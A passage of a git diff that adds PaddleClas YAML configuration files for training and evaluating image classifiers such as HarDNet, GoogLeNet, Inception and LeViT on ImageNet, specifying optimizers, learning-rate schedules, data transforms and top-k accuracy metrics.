transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: 
[0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet68.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet68.yaml new file mode 100644 index 0000000..258ce14 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet68.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HarDNet68 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: 
./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet68_ds.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet68_ds.yaml new file mode 100644 index 0000000..a3837d2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet68_ds.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HarDNet68_ds + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + 
+ +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet85.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet85.yaml new file mode 100644 index 0000000..f60e10b --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/HarDNet/HarDNet85.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: 
null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: HarDNet85 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + 
scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/GoogLeNet.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/GoogLeNet.yaml new file mode 100644 index 0000000..579b01c --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/GoogLeNet.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: GoogLeNet + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - GoogLeNetLoss: + weight: 1.0 + Eval: + - GoogLeNetLoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: 
./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - GoogLeNetTopkAcc: + topk: [1, 5] + Eval: + - GoogLeNetTopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/InceptionV3.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/InceptionV3.yaml new file mode 100644 index 0000000..fa8b64a --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/InceptionV3.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 299, 299] + save_inference_dir: ./inference + +# model architecture +Arch: + name: InceptionV3 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train 
and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 299 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/InceptionV4.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/InceptionV4.yaml new file mode 100644 index 0000000..6a6dbb6 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Inception/InceptionV4.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + 
pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 200 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 299, 299] + save_inference_dir: ./inference + +# model architecture +Arch: + name: InceptionV4 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.045 + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 299 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + batch_transform_ops: + - MixupOperator: + alpha: 0.2 + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 320 + - CropImage: + size: 
299 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_128.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_128.yaml new file mode 100644 index 0000000..1016421 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_128.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: LeViT_128 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + 
cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_128S.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_128S.yaml new file mode 100644 index 0000000..84c0353 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_128S.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: LeViT_128S + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 
+ + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_192.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_192.yaml new file mode 100644 index 0000000..5b9c107 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_192.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + 
output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: LeViT_192 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 
1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_256.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_256.yaml new file mode 100644 index 0000000..a7e99af --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_256.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: LeViT_256 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + 
cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_384.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_384.yaml new file mode 100644 index 0000000..f6d5852 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/LeViT/LeViT_384.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: LeViT_384 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + 
+# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + 